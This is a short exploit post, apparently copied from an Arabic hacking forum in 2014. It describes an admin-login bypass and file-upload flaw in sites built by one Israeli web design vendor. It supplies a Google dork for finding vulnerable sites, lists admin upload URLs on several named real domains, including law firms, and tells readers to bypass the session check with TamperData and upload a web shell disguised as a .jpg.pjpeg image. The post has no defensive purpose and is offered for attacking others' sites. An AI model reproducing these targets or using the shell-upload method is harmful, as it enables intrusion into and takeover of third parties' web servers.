######################################
# Exploit Title : Bypass login [ SESSION ] Upload #
# Author : Lov3rDns #
# Contact : [skype:Lov3rDns] #
# Dork : inurl:/page.asp?NewsID= & /page.asp?PageID= #
# Tested on : win7 #
# Vendor's Website : http://www.ekdesign.co.il/ #
# Date : [2014/5/26] #
#######################################
Vulnerability
********************
[+] Vulnerability
[+] http://www.dt-law.co.il/admin/[UPLOAD]
[+] www.site.com/modules/admin/[UPLOAD]
***********
Exploit ..
***********
http://testcar.co.il/admin/[UPLOAD]
http://testcar.co.il/admin/upload.asp
http://www.pgs-law.co.il/admin/upload.asp
http://www.dt-law.co.il/admin/upload.asp
************************************************** ******************************
Bypass and upload your shell , TamperData .. img.jpg.pjpeg <<
Good luck
************************************************** ******************************
06-18-2014, 12:49 PM
ثغرة رفع الشل و تخطي الادمن bypass login session
العرض الشجري